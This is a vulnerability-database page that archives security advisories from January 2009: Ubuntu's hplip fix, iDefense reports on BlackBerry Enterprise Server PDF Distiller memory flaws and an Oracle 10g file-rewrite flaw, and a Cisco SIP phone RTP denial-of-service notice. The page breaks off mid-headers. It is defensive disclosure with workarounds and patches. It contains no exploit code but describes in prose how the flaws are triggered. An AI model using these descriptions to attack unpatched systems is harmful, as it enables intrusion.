English | Deutsch | Español | Português
 UserID:
 Passwd:
new user
 About:   Dedicated  | Advanced  | Standard  | Recurring  | No Risk  | Desktop  | Basic  | Single  | Security Seal  | FAQ
  Price/Feature Summary  | Order  | New Vulnerabilities  | Confidentiality  | Vulnerability Search
 Vulnerability   
Search   
    Search 61204 CVE descriptions
and 32582 test descriptions,
access 10,000+ cross references.
Tests   CVE   All  

===========================================================
Ubuntu Security Notice USN-708-1           January 13, 2009
hplip vulnerability
https://launchpad.net/bugs/191299
===========================================================

A security issue affects the following Ubuntu releases:

Ubuntu 7.10

This advisory also applies to the corresponding versions of
Kubuntu, Edubuntu, and Xubuntu.

The problem can be corrected by upgrading your system to the
following package versions:

Ubuntu 7.10:
  hplip                           2.7.7.dfsg.1-0ubuntu5.3

In general, a standard system upgrade is sufficient to effect the
necessary changes.

Details follow:

It was discovered that an installation script in the HPLIP package would
change permissions on the hplip config files located in user's home directories.
A local user could exploit this and change permissions on arbitrary files
upon an HPLIP installation or upgrade, which could lead to root privileges.


Updated packages for Ubuntu 7.10:

  Source archives:

    http://security.ubuntu.com/ubuntu/pool/main/h/hplip/hplip_2.7.7.dfsg.1-0ubuntu5.3.diff.gz
      Size/MD5:   149462 e8b5cb18aff082738bfcfe069eb873f5
    http://security.ubuntu.com/ubuntu/pool/main/h/hplip/hplip_2.7.7.dfsg.1-0ubuntu5.3.dsc
      Size/MD5:     1064 531e707f0cbace5f1eb82039e409c306
    http://security.ubuntu.com/ubuntu/pool/main/h/hplip/hplip_2.7.7.dfsg.1.orig.tar.gz
      Size/MD5: 14361049 ae5165d46413db8119979f5b3345f7a5

  Architecture independent packages:

    http://security.ubuntu.com/ubuntu/pool/main/h/hplip/hplip-data_2.7.7.dfsg.1-0ubuntu5.3_all.deb
      Size/MD5:  6898006 691895b0f8e5fc93bcb86d47d11da1af
    http://security.ubuntu.com/ubuntu/pool/main/h/hplip/hplip-doc_2.7.7.dfsg.1-0ubuntu5.3_all.deb
      Size/MD5:  4146918 d4e0b928aacc84bbe2a05862050a5963
    http://security.ubuntu.com/ubuntu/pool/main/h/hplip/hplip-gui_2.7.7.dfsg.1-0ubuntu5.3_all.deb
      Size/MD5:   117628 91f0c9d09f2520e76b3a3e6cde4abd63
    http://security.ubuntu.com/ubuntu/pool/universe/h/hplip/hpijs-ppds_2.7.7+2.7.7.dfsg.1-0ubuntu5.3_all.deb
      Size/MD5:   480134 59604754cef89d7b5ae128ecf20f44da

  amd64 architecture (Athlon64, Opteron, EM64T Xeon):

    http://security.ubuntu.com/ubuntu/pool/main/h/hplip/hpijs_2.7.7+2.7.7.dfsg.1-0ubuntu5.3_amd64.deb
      Size/MD5:   341576 918813fb4741326051c7480ffeae9a9a
    http://security.ubuntu.com/ubuntu/pool/main/h/hplip/hplip-dbg_2.7.7.dfsg.1-0ubuntu5.3_amd64.deb
      Size/MD5:   770122 ccef78fc8a55b4e94318931964e9e97b
    http://security.ubuntu.com/ubuntu/pool/main/h/hplip/hplip_2.7.7.dfsg.1-0ubuntu5.3_amd64.deb
      Size/MD5:   302856 f2a47e27a69aa016334a1ffdac105be1

  i386 architecture (x86 compatible Intel/AMD):

    http://security.ubuntu.com/ubuntu/pool/main/h/hplip/hpijs_2.7.7+2.7.7.dfsg.1-0ubuntu5.3_i386.deb
      Size/MD5:   334690 dd891b2df494fd1fbc46abd25b9ef7db
    http://security.ubuntu.com/ubuntu/pool/main/h/hplip/hplip-dbg_2.7.7.dfsg.1-0ubuntu5.3_i386.deb
      Size/MD5:   747250 4676694a4d20445e64f3f4dc91aaa44c
    http://security.ubuntu.com/ubuntu/pool/main/h/hplip/hplip_2.7.7.dfsg.1-0ubuntu5.3_i386.deb
      Size/MD5:   290282 921463222e2b642fb5bc16083d8b70ac

  lpia architecture (Low Power Intel Architecture):

    http://ports.ubuntu.com/pool/main/h/hplip/hpijs_2.7.7+2.7.7.dfsg.1-0ubuntu5.3_lpia.deb
      Size/MD5:   337798 9c060add246bb5212706b9dd0d92cc51
    http://ports.ubuntu.com/pool/main/h/hplip/hplip-dbg_2.7.7.dfsg.1-0ubuntu5.3_lpia.deb
      Size/MD5:   926096 af4481ea010212486ea621103329cf13
    http://ports.ubuntu.com/pool/main/h/hplip/hplip_2.7.7.dfsg.1-0ubuntu5.3_lpia.deb
      Size/MD5:   290082 f26b9fc31e3457719b3102b3a9c77b5b

  powerpc architecture (Apple Macintosh G3/G4/G5):

    http://security.ubuntu.com/ubuntu/pool/main/h/hplip/hpijs_2.7.7+2.7.7.dfsg.1-0ubuntu5.3_powerpc.deb
      Size/MD5:   348258 66f9714865cad898e10e98ef83f6e443
    http://security.ubuntu.com/ubuntu/pool/main/h/hplip/hplip-dbg_2.7.7.dfsg.1-0ubuntu5.3_powerpc.deb
      Size/MD5:   784504 0c76dac215474fc62900aea547168387
    http://security.ubuntu.com/ubuntu/pool/main/h/hplip/hplip_2.7.7.dfsg.1-0ubuntu5.3_powerpc.deb
      Size/MD5:   319006 52d13211d1681fe90b74951dc204a788

  sparc architecture (Sun SPARC/UltraSPARC):

    http://security.ubuntu.com/ubuntu/pool/main/h/hplip/hpijs_2.7.7+2.7.7.dfsg.1-0ubuntu5.3_sparc.deb
      Size/MD5:   332756 a3411ca114399f0359b949462e0313ab
    http://security.ubuntu.com/ubuntu/pool/main/h/hplip/hplip-dbg_2.7.7.dfsg.1-0ubuntu5.3_sparc.deb
      Size/MD5:   717210 401d1050417a9a8608198088abb9e305
    http://security.ubuntu.com/ubuntu/pool/main/h/hplip/hplip_2.7.7.dfsg.1-0ubuntu5.3_sparc.deb
      Size/MD5:   289370 f92c0c0f6a2f2ccef18d3874db728bf7



--=-CXh9fLe/CpQXpMIMbKne
Content-Type: application/pgp-signature; name="signature.asc"
Content-Description: This is a digitally signed message part

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (GNU/Linux)

iEYEABECAAYFAkls/o8ACgkQLMAs/0C4zNrcLgCghOdVf4DIVYQ/G4ERIDP2qJ2P
wKcAn05AE2q/x4yoir1sbwux1JtUtBmU
=8Pw+
-----END PGP SIGNATURE-----

--=-CXh9fLe/CpQXpMIMbKne--

From - Tue Jan 13 17:12:17 2009
X-Account-Key: account7
X-UIDL: 4909bb8c000058b4
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-39155-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing3.securityfocus.com (outgoing.securityfocus.com [205.206.231.27])
by mx.securityspace.com (Postfix) with ESMTP id 1ABCDEC131
for <lists@securityspace.com>; Tue, 13 Jan 2009 17:10:52 -0500 (EST)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing3.securityfocus.com (Postfix) with QMQP
id 16C86237198; Tue, 13 Jan 2009 14:45:01 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 13167 invoked from network); 13 Jan 2009 20:39:13 -0000
Message-ID: <496D00F3.5020603@idefense.com>
Date: Tue, 13 Jan 2009 16:00:35 -0500
From: iDefense Labs <labs-no-reply@idefense.com>
User-Agent: Thunderbird 2.0.0.19 (Windows/20081209)
MIME-Version: 1.0
To: bugtraq@securityfocus.com, vulnwatch@vulnwatch.org,
full-disclosure@lists.grok.org.uk
Subject: iDefense Security Advisory 01.13.09: RIM BlackBerry Enterprise Server
 Attachment Service PDF Distiller 'bitmaps' Heap Overflow Vulnerability
X-Enigmail-Version: 0.95.7
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: 8bit
Status:   

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

iDefense Security Advisory 01.12.09
http://labs.idefense.com/intelligence/vulnerabilities/
Jan 12, 2009

I. BACKGROUND

The BlackBerry Enterprise Server is a suite of applications used to
connect enterprise email and messaging services to BlackBerry device
users. It consists of a variety of applications, one of which is the
Attachment Service. This application is used to convert email
attachments into a format that is easily rendered on BlackBerry
devices. When a user requests an attachment on their BlackBerry device,
the Attachment Service will obtain the attachment, parse and convert it,
and then send it to the user for viewing. The Attachment Service is
capable of converting a variety of different file formats, including
PDF files. This vulnerability affects the PDF filter/distiller. For
more information, see the vendor's site found at the following link.

http://na.blackberry.com/eng/services/server/

II. DESCRIPTION

Remote exploitation of a heap overflow vulnerability in Research In
Motion Ltd. (RIM)'s BlackBerry Enterprise Server could allow an
attacker to execute arbitrary code with the privileges of the affected
service, usually SYSTEM.

The vulnerability occurs when parsing a data stream inside of a PDF
file. During parsing, a dynamic array is filled up with pointers to
certain objects without properly checking to see whether the array is
large enough to hold all of the pointers. By inserting a large number
of pointers, it is possible to overflow the array, and corrupt object
pointers. This can lead to the EIP register being controlled, which
results in the execution of arbitrary code.

III. ANALYSIS

Exploitation of this vulnerability results in the execution of arbitrary
code with the privileges of the Attachment Service, usually SYSTEM. In
order to exploit this vulnerability, an attacker must e-mail an
enterprise BlackBerry user a malicious PDF file. Then, the user must
attempt to view the file on their device. It is important to note that
a user must request the attachment in order to trigger the parsing. It
is not possible to exploit this vulnerability in a completely automated
fashion without a user asking to view the file. However, after a user
has requested the attachment, no further interaction is necessary.

In Labs testing, it was possible to gain code execution, albeit
unreliably. It is likely that with additional heap sculpting reliable
code execution is possible.

IV. DETECTION

iDefense has confirmed the existence of this vulnerability in BlackBerry
Enterprise Server version 4.1.5 and 4.1.6 (4.1 SP5, SP6). 4.1.6 is the
most current version, as of the publishing of this report. This
vulnerability was confirmed in BlackBerry Enterprise Server for
Microsoft Exchange, but is believed to affect the Lotus and Novell
versions as well. Previous versions may also be affected.

V. WORKAROUND

It is possible to disable the PDF Distiller, which will prevent the
conversion of PDF files by the Attachment Server. The following
workaround was suggested by RIM for a previous PDF Distiller
vulnerability, and has been verified to prevent the vulnerability
described in this report. This workaround can be accomplished as
follows:

To remove the PDF file extension from the list of supported file format
extensions, complete the following actions:

   1. From the Windows Desktop, open the BlackBerry Server Configuration
tool.
   2. Click the Attachment Server tab.
   3. In the Format Extensions field, delete pdf: from the colon
delimited list of extensions.
   4. Click Apply.
   5. Click OK.

After this, it is also necessary to completely disable the PDF distiller
from loading, which will prevent an attacker from renaming a PDF to some
other format extension. In order to do this, complete the following
steps:

   1. On the Windows Desktop, open the BlackBerry Server Configuration tool.
   2. Click the Attachment Server tab.
   3. In the Configuration Option drop-down list, select Attachment Server.
   4. In the Distiller Settings section, next to the distiller name
Adobe PDF, clear the check box in the Enabled column.
   5. Click Apply.
   6. Click OK.
   7. On the Windows Desktop, in Administrative Tools, open Services.
   8. Right-click BlackBerry Attachment Service and click Stop.
   9. Right-click BlackBerry Attachment Service and click Start.
  10. Close Services.

In Microsoft Exchange and Novell GroupWise environments, complete the
following additional steps:

   1. On the Windows Desktop, in Administrative Tools, open Services.
   2. Right-click BlackBerry Dispatcher and click Stop.
   3. Right-click BlackBerry Dispatcher and click Start.
   4. Close Services.

In IBM Lotus Domino environments, complete the following additional
steps:

   1. Open the IBM Lotus Domino Administrator.
   2. Click the Server tab.
   3. Click the Status tab.
   4. Click Server Console.
   5. In the Domino Command field, type tell BES quit and press ENTER.
   6. In the Domino Command field, type load BES and press ENTER.
   7. Close the IBM Lotus Domino Administrator.

VI. VENDOR RESPONSE

Research In Motion (RIM) has released a patch which addresses this
issue. For more information, consult their advisories at the following
URLs:

http://www.blackberry.com/btsc/search.do?cmd=displayKC&docType=kc&externalId=KB17118

http://www.blackberry.com/btsc/search.do?cmd=displayKC&docType=kc&externalId=KB17119

VII. CVE INFORMATION

A Mitre Corp. Common Vulnerabilities and Exposures (CVE) number has not
been assigned yet.

VIII. DISCLOSURE TIMELINE

12/17/2008  Initial Vendor Notification
12/17/2008  Initial Vendor Reply
12/17/2008  PoC Code Provided To Vendor
12/17/2008  Request Additional Information
01/06/2009  Additional Vendor Feedback
01/12/2009  Coordinated Public Disclosure

IX. CREDIT

This vulnerability was discovered by Sean Larsson, iDefense Labs.

Get paid for vulnerability research
http://labs.idefense.com/methodology/vulnerability/vcp.php

Free tools, research and upcoming events
http://labs.idefense.com/

X. LEGAL NOTICES

Copyright  2009 iDefense, Inc.

Permission is granted for the redistribution of this alert
electronically. It may not be edited in any way without the express
written consent of iDefense. If you wish to reprint the whole or any
part of this alert in any other medium other than electronically,
please e-mail customerservice@idefense.com for permission.

Disclaimer: The information in the advisory is believed to be accurate
at the time of publishing based on currently available information. Use
of the information constitutes acceptance for use in an AS IS condition.
 There are no warranties with regard to this information. Neither the
author nor the publisher accepts any liability for any direct,
indirect, or consequential loss or damage arising from use of, or
reliance on, this information.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.7 (MingW32)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org

iD8DBQFJbQDzbjs6HoxIfBkRAhnAAKDZYptCie3tSrK5m9G5753o7SnDAQCfW6Xb
G4mUm1dDbfiyJcdW3Aq6CvI=7Ilu
-----END PGP SIGNATURE-----

From - Tue Jan 13 17:22:17 2009
X-Account-Key: account7
X-UIDL: 4909bb8c000058b5
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-39156-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing3.securityfocus.com (outgoing.securityfocus.com [205.206.231.27])
by mx.securityspace.com (Postfix) with ESMTP id 3FD62EC132
for <lists@securityspace.com>; Tue, 13 Jan 2009 17:20:39 -0500 (EST)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing3.securityfocus.com (Postfix) with QMQP
id CE3C1237232; Tue, 13 Jan 2009 14:45:27 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 14488 invoked from network); 13 Jan 2009 21:13:25 -0000
Message-ID: <496D08F6.7050700@idefense.com>
Date: Tue, 13 Jan 2009 16:34:46 -0500
From: iDefense Labs <labs-no-reply@idefense.com>
User-Agent: Thunderbird 2.0.0.19 (Windows/20081209)
MIME-Version: 1.0
To: bugtraq@securityfocus.com, vulnwatch@vulnwatch.org,
full-disclosure@lists.grok.org.uk
Subject: iDefense Security Advisory 01.13.09: RIM BlackBerry Enterprise Server
 Attachment Service PDF Distiller Uninitialized Memory Vulnerability
X-Enigmail-Version: 0.95.7
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: 8bit
Status:   

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

iDefense Security Advisory 01.12.09
http://labs.idefense.com/intelligence/vulnerabilities/
Jan 12, 2009

I. BACKGROUND

The BlackBerry Enterprise Server is a suite of applications used to
connect enterprise email and messaging services to BlackBerry device
users. It consists of a variety of applications, one of which is the
Attachment Service. This application is used to convert email
attachments into a format that is easily rendered on BlackBerry
devices. When a user requests an attachment on their BlackBerry device,
the Attachment Service will obtain the attachment, parse and convert it,
and then send it to the user for viewing. The Attachment Service is
capable of converting a variety of different file formats, including
PDF files. This vulnerability affects the PDF filter/distiller. For
more information, see the vendor's site found at the following link.

http://na.blackberry.com/eng/services/server/

II. DESCRIPTION

Remote exploitation of an uninitialized memory vulnerability in Research
In Motion Ltd.'s BlackBerry Enterprise Server could allow an attacker to
execute arbitrary code with the privileges of the affected service,
which is usually SYSTEM.

The vulnerability occurs when parsing a data stream inside of a PDF
file. Due to a logic error, it is possible to allocate an array of
object pointers that is never initialized. This array is located on the
heap. When the object that contains this array is destroyed, each
pointer in the array is deleted. Since the memory is never properly
initialized, whatever content was previously there is used. It is
possible to control the chunk of memory that gets allocated for this
array, which can lead to attacker-controlled values being used as
object pointers. This results in the execution of arbitrary code when
these pointers are deleted.

III. ANALYSIS

Exploitation of this vulnerability results in the execution of arbitrary
code with the privileges of the Attachment Service, usually SYSTEM. In
order to exploit this vulnerability, an attacker must email an
enterprise BlackBerry user a malicious PDF file. Then, the user must
attempt to view the file on their device. It is important to note that
a user must request the attachment in order to trigger the parsing. It
is not possible to exploit this vulnerability in a completely automated
fashion without a user asking to view the file. However, after a user
has requested the attachment, no further interaction is necessary.

Labs testing has demonstrated that this vulnerability is highly
exploitable. It is possible to layout the heap in such a way that a
previously allocated chunk of fully controllable memory is reused for
the uninitialized memory clock. Code execution is then gained when this
memory is used as an array of object pointers.

IV. DETECTION

iDefense has confirmed the existence of this vulnerability in BlackBerry
Enterprise Server version 4.1.5 and 4.1.6 (4.1 SP5, SP6). 4.1.6 is the
most current version, as of the publishing of this report. This
vulnerability was confirmed in BlackBerry Enterprise Server for
Microsoft Exchange, but is believed to affect the Lotus and Novell
versions as well. Previous versions may also be affected.

V. WORKAROUND

It is possible to disable the PDF Distiller, which will prevent the
conversion of PDF files by the Attachment Server. The following
workaround was suggested by RIM for a previous PDF Distiller
vulnerability, and has been verified to prevent the vulnerability
described in this report. This workaround can be accomplished as
follows:

To remove the PDF file extension from the list of supported file format
extensions, complete the following actions:

   1. From the Windows Desktop, open the BlackBerry Server Configuration
tool.
   2. Click the Attachment Server tab.
   3. In the Format Extensions field, delete pdf: from the colon
delimited list of extensions.
   4. Click Apply.
   5. Click OK.

After this, it is also necessary to completely disable the PDF distiller
from loading, which will prevent an attacker from renaming a PDF to some
other format extension. In order to do this, complete the following
steps:

   1. On the Windows Desktop, open the BlackBerry Server Configuration tool.
   2. Click the Attachment Server tab.
   3. In the Configuration Option drop-down list, select Attachment Server.
   4. In the Distiller Settings section, next to the distiller name
Adobe PDF, clear the check box in the Enabled column.
   5. Click Apply.
   6. Click OK.
   7. On the Windows Desktop, in Administrative Tools, open Services.
   8. Right-click BlackBerry Attachment Service and click Stop.
   9. Right-click BlackBerry Attachment Service and click Start.
  10. Close Services.

In Microsoft Exchange and Novell GroupWise environments, complete the
following additional steps:

   1. On the Windows Desktop, in Administrative Tools, open Services.
   2. Right-click BlackBerry Dispatcher and click Stop.
   3. Right-click BlackBerry Dispatcher and click Start.
   4. Close Services.

In IBM Lotus Domino environments, complete the following additional
steps:

   1. Open the IBM Lotus Domino Administrator.
   2. Click the Server tab.
   3. Click the Status tab.
   4. Click Server Console.
   5. In the Domino Command field, type tell BES quit and press ENTER.
   6. In the Domino Command field, type load BES and press ENTER.
   7. Close the IBM Lotus Domino Administrator.

VI. VENDOR RESPONSE

Research In Motion (RIM) has released a patch which addresses this
issue. For more information, consult their advisories at the following
URLs:

http://www.blackberry.com/btsc/search.do?cmd=displayKC&docType=kc&externalId=KB17118

http://www.blackberry.com/btsc/search.do?cmd=displayKC&docType=kc&externalId=KB17119

VII. CVE INFORMATION

A Mitre Corp. Common Vulnerabilities and Exposures (CVE) number has not
been assigned yet.

VIII. DISCLOSURE TIMELINE

12/17/2008  Initial Vendor Notification
12/17/2008  Initial Vendor Reply
12/17/2008  PoC Code Provided To Vendor
12/17/2008  Request Additional Information
01/06/2009  Additional Vendor Feedback
01/12/2009  Coordinated Public Disclosure

IX. CREDIT

This vulnerability was discovered by Sean Larsson, iDefense Labs.

Get paid for vulnerability research
http://labs.idefense.com/methodology/vulnerability/vcp.php

Free tools, research and upcoming events
http://labs.idefense.com/

X. LEGAL NOTICES

Copyright  2009 iDefense, Inc.

Permission is granted for the redistribution of this alert
electronically. It may not be edited in any way without the express
written consent of iDefense. If you wish to reprint the whole or any
part of this alert in any other medium other than electronically,
please e-mail customerservice@idefense.com for permission.

Disclaimer: The information in the advisory is believed to be accurate
at the time of publishing based on currently available information. Use
of the information constitutes acceptance for use in an AS IS condition.
 There are no warranties with regard to this information. Neither the
author nor the publisher accepts any liability for any direct,
indirect, or consequential loss or damage arising from use of, or
reliance on, this information.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.7 (MingW32)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org

iD8DBQFJbQj2bjs6HoxIfBkRAvk8AKCXLr3nL6/AP++XM17670BnSZdzxgCg/dQg
gB68kHgJzbwjHNQ0i/rIQDot+
-----END PGP SIGNATURE-----

From - Wed Jan 14 11:42:18 2009
X-Account-Key: account7
X-UIDL: 4909bb8c000058cf
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-39158-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing3.securityfocus.com (outgoing.securityfocus.com [205.206.231.27])
by mx.securityspace.com (Postfix) with ESMTP id BA6F2EC119
for <lists@securityspace.com>; Wed, 14 Jan 2009 11:40:01 -0500 (EST)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing3.securityfocus.com (Postfix) with QMQP
id B23862371DF; Wed, 14 Jan 2009 09:12:20 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 18033 invoked from network); 13 Jan 2009 22:14:56 -0000
Message-ID: <496D1762.8090707@idefense.com>
Date: Tue, 13 Jan 2009 17:36:18 -0500
From: iDefense Labs <labs-no-reply@idefense.com>
User-Agent: Thunderbird 2.0.0.19 (Windows/20081209)
MIME-Version: 1.0
To: bugtraq@securityfocus.com, vulnwatch@vulnwatch.org,
full-disclosure@lists.grok.org.uk
Subject: iDefense Security Advisory 01.13.09: Oracle Database 10g R2 Summary
 Advisor Arbitrary File Rewrite Vulnerability
X-Enigmail-Version: 0.95.7
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: 8bit
Status:   

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

iDefense Security Advisory 01.12.09
http://labs.idefense.com/intelligence/vulnerabilities/
Jan 12, 2009

I. BACKGROUND

Oracle Database Server is a family of database products that range from
personal databases to enterprise solutions. Further information is
available at the following URL:

http://www.oracle.com/database/index.html

II. DESCRIPTION

Local exploitation of an arbitrary file rewrite vulnerability in Oracle
Corp.'s Oracle Database 10g Release 2 database product allows attackers
to gain elevated privileges.

The vulnerability exists in a function that allows a user with an
authenticated session to create any file or rewrite any files to which
the database account has access.

III. ANALYSIS

Successful exploitation allows the attacker to gain database account
privilege. On Linux and Unix systems the database account is usually
'oracle' while on Windows systems it is the 'SYSTEM' account. To
exploit this vulnerability, the attacker must create a session and
execute the privileged procedure.

IV. DETECTION

iDefense has confirmed the existence of this vulnerability in Oracle
Database 10g Release 2 version 10.2.0.3.0 on 32-bit Linux platform and
Windows platform. Previous versions may also be affected. Oracle
Database 11g Release 1 version 11.1.0.6.0 is not affected by this
vulnerability.

V. WORKAROUND

iDefense is currently unaware of any workaround for this issue.

VI. VENDOR RESPONSE

Oracle has released a patch which addresses this issue. For more
information, consult their advisory at the following URL.

http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpujan2009.html

VII. CVE INFORMATION

The Common Vulnerabilities and Exposures (CVE) project has assigned the
name CVE-2008-3997 to this issue. This is a candidate for inclusion in
the CVE list (http://cve.mitre.org/), which standardizes names for
security problems.

VIII. DISCLOSURE TIMELINE

03/24/2008  - Initial Vendor Notification
03/25/2008  - Initial Vendor Response
11/24/2008  - Status update from Vendor
01/12/2009  - Coordinated Public Disclosure

IX. CREDIT

This vulnerability was reported to iDefense by Code Audit Labs
(http://vulnhunt.com).

Get paid for vulnerability research
http://labs.idefense.com/methodology/vulnerability/vcp.php

Free tools, research and upcoming events
http://labs.idefense.com/

X. LEGAL NOTICES

Copyright  2009 iDefense, Inc.

Permission is granted for the redistribution of this alert
electronically. It may not be edited in any way without the express
written consent of iDefense. If you wish to reprint the whole or any
part of this alert in any other medium other than electronically,
please e-mail customerservice@idefense.com for permission.

Disclaimer: The information in the advisory is believed to be accurate
at the time of publishing based on currently available information. Use
of the information constitutes acceptance for use in an AS IS condition.
 There are no warranties with regard to this information. Neither the
author nor the publisher accepts any liability for any direct,
indirect, or consequential loss or damage arising from use of, or
reliance on, this information.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.7 (MingW32)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org

iD8DBQFJbRdibjs6HoxIfBkRAv6CAKCa1cUtfi1arGPT0w1RpxOtRC2UNQCfaB0N
tk0EnS1YCSDeA7xSxi6Xs5w=NyBd
-----END PGP SIGNATURE-----

From - Wed Jan 14 11:52:18 2009
X-Account-Key: account7
X-UIDL: 4909bb8c000058d0
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-39173-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing2.securityfocus.com (outgoing.securityfocus.com [205.206.231.26])
by mx.securityspace.com (Postfix) with ESMTP id 0A0BFEC14C
for <lists@securityspace.com>; Wed, 14 Jan 2009 11:44:33 -0500 (EST)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing2.securityfocus.com (Postfix) with QMQP
id 726B3143A6C; Wed, 14 Jan 2009 09:33:46 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 31869 invoked from network); 14 Jan 2009 12:05:37 -0000
Message-ID: <496DDAAC.8070605@orange-ftgroup.com>
Date: Wed, 14 Jan 2009 13:29:32 +0100
From: Laurent Butti <laurent.butti@orange-ftgroup.com>
User-Agent: Thunderbird 2.0.0.18 (X11/20081125)
MIME-Version: 1.0
To: bugtraq@securityfocus.com
Subject: Cisco Unified IP Phone 7960G and 7940G (SIP) RTP Header Vulnerability
X-Enigmail-Version: 0.95.7
Content-Type: text/plain; charset=ISO-8859-15
Content-Transfer-Encoding: 7bit
X-OriginalArrivalTime: 14 Jan 2009 12:29:21.0597 (UTC) FILETIME=[BA393ED0:01C97643]
Status:   

Title:
------
* Cisco Unified IP Phone 7960G and 7940G (SIP) RTP Header Vulnerability

Summary:
--------
* The Cisco Unified IP Phone 7960G and 7940G (SIP) do not correctly
parse some malformed RTP headers leading to a deterministic denial of
service

Assigned CVE:
-------------
* CVE-2008-4444

Details:
--------
* SIP protocol is used to set up calls between phones. Once the call is
established, the media content is carried by the RTP protocol. A remote
attacker could send a specially crafted RTP packet against a Cisco SIP
phone in such a way as to cause the phone to reboot.

Attack Impact:
--------------
* Denial-of-service (reboot or hang-up) and possibly remote arbitrary
code execution

Attack Vector:
--------------
* Have the possibility to setup a call to the targeted phone and carry
RTP frame to the vulnerable device
* Have access to the VoIP network while a call is established and inject
RTP frames

Timeline:
---------
* 2008-06-13 - Vulnerability reported to Cisco
* 2008-06-16 - Full details sent to Cisco
* 2008-10-21 - Cisco released a patched firmware
* 2009-01-14 - Release of this security advisory

Affected Products:
------------------
* Cisco Unified IP Phone 7960G and 7940G (SIP) with P0S3-08-9-00
firmware. Cisco released a patched firmware on October 21, 2008 which is
described in the bug identifier CSCsu22285 (Cisco Unified IP Phone 7960G
and 7940G (SIP) Release Notes for Firmware Release 8.10).

Credits:
--------
* This vulnerability was discovered by Gabriel Campana and Laurent Butti
from France Telecom / Orange

From - Wed Jan 14 12:02:17 2009
X-Account-Key: account7
X-UIDL: 4909bb8c000058d2
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-39159-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing3.securityfocus.com (outgoing.securityfocus.com [205.206.231.27])
by mx.securityspace.com (Postfix) with ESMTP id 53E85EC14C
for <lists@securityspace.com>; Wed, 14 Jan 2009 12:02:12 -0500 (EST)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing3.securityfocus.com (Postfix) with QMQP
id 3C74F237017; Wed, 14 Jan 2009 09:15:42 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
